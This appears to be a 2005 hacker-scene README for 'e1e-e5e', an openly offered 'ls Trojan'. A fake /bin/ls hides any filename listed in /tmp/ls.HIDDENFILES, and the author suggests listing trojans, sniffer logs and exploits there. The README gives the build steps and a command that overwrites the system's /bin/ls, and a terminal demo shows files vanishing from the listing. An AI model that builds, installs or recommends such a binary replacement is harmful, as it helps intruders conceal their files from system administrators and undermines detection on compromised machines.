-=[ e1e-e5e - ls Trojan [file hidder] -=[ nitrous@danitrous.org -=[ http://www.danitrous.org -=[ 30/Jun/2005 -=[ Mexico -=[ INTRODUCTION e1e-e5e is an utility to hide some files, How? First of all, make a copy of ./HIDENFILES to /tmp/ls.HIDENFILES and /bin/ls to /tmp/ls.bkp, after that, our ./ls read each line from /tmp/ls.HIDENFILES and compare it with each current directory's filename. So, if any name is equal with any line from ls.HIDENFILES, this fake ls binary don't show this filename. Before compilation, is necessary to edit HIDDENFILES where you can insert trojan filenames, sniff logs, exploits, and so on. Try It, Enjoy It ! -=[ FEATURES Possible options (and some combinations): $ls -l $ls -a $ls -la $ls -l -a $ls -a -l (Only show the files of current directory) If another different switch is passed to program, the program does: execve(/tmp/ls.bkp, argv, NULL); -=[ COMPILATION AND INSTALLATION NOTES To compile the fake 'ls', type: $./builder.sh $./ls (Try the ./ls compiled ;) ) After that, you can install ./ls [trojan] typing: #install -m 755 ./ls /bin/ls IMPORTANT NOTE !!!: If you replace /bin/ls with ./ls trojan, your system going SUCKS !! and the trojan too. Why? Because you need to append: 'export LS_OPTIONS=""' in each /home/user/.bashrc, but in the next reboot, the OS will be STUPID !. Well, it happens (hrm, my system does[ubuntu]). If you want to try, TRY IT ! and send me an e-mail with your results ;). To uninstall: (Optional, only if you removed the original /bin/ls [overwritten with the ./ls trojan]): (#mv /tmp/ls.bkp /bin/ls) $rm /tmp/ls.bkp $rm /tmp/ls.HIDDENFILES This leaves the original 'ls' in the correct place ;) and removes another (unused) files... -=[ EXAMPLE nitrous@blackb0x:~ $ ls -l [THIS IS THE ORIGINAL /bin/ls] total 426 drwxr-xr-x 2 nitrous nitrous 4096 2005-05-19 09:37 Desktop drwxr-xr-x 30 nitrous nitrous 4096 2005-07-01 06:51 SOFTWARE -rwxr--r-- 1 nitrous nitrous 394375 2005-05-19 09:42 VSI_Wallpaper_Edition.jpg drwxr-xr-x 8 nitrous nitrous 4096 2005-06-26 06:54 c0de drwxr-xr-x 12 nitrous nitrous 4096 2005-06-29 04:16 exploits drwxr-xr-x 7 nitrous nitrous 4096 2005-05-26 10:10 java dr-xr-xr-x 34 root root 8192 2005-06-27 11:43 misd0x -rwxr-xr-x 4 nitrous nitrous 96 2005-06-30 11:19 nitrousc0de.txt drwxr-xr-x 13 nitrous nitrous 4096 2005-07-01 05:36 research nitrous@blackb0x:~ $ echo "exploits" >> /tmp/ls.HIDDENFILES nitrous@blackb0x:~ $ echo "nitrousc0de.txt" >> /tmp/ls.HIDDENFILES nitrous@blackb0x:~ $ research/e1e-e5e/ls -l [THIS IS MY LS (trojan)] total 422 drwxr-xr-x 2 nitrous nitrous 4096 2005-05-19 09:37 Desktop drwxr-xr-x 30 nitrous nitrous 4096 2005-07-01 06:51 SOFTWARE -rwxr--r-- 1 nitrous nitrous 394375 2005-05-19 09:42 VSI_Wallpaper_Edition.jpg drwxr-xr-x 8 nitrous nitrous 4096 2005-06-26 06:54 c0de drwxr-xr-x 7 nitrous nitrous 4096 2005-05-26 10:10 java dr-xr-xr-x 34 root root 8192 2005-06-27 11:43 misd0x drwxr-xr-x 13 nitrous nitrous 4096 2005-07-01 05:36 research nitrous@blackb0x:~ $ As you can see, my ./ls hide all files listed in /tmp/ls.HIDDENFILES; in this case /tmp/ls.HIDDENFILES contains the strings: 'exploits' and 'nitrousc0de.txt', so... Don't show this files ;), easy?. -=[ FILES /bin/ls The trojan /tmp/ls.bkp: The real ls (backup) /tmp/ls.HIDDENFILES List of files to hide -=[ BUGS When you type something like: $ls or $ls -a Jeje, the fuckin' tabs and spaces between filenames. Sorry, I'm lazy and bored =(. -=[ FINAL WORDS Sorry for my bad english skillz, but I need to practice. Greets to Vulnfact Security Crew (www.vulnfact.com), CUM(shot) ppl, friends ...blah blah. Oh and a delicious cherry called JSS ;)... NOTE: The file 'filemode.c' and 'filemode.h" are from GNU/fileutils-4.1, I included this files because contains the mode_string() routine which convert a filemode in Octal notation into a string, nice uh? =).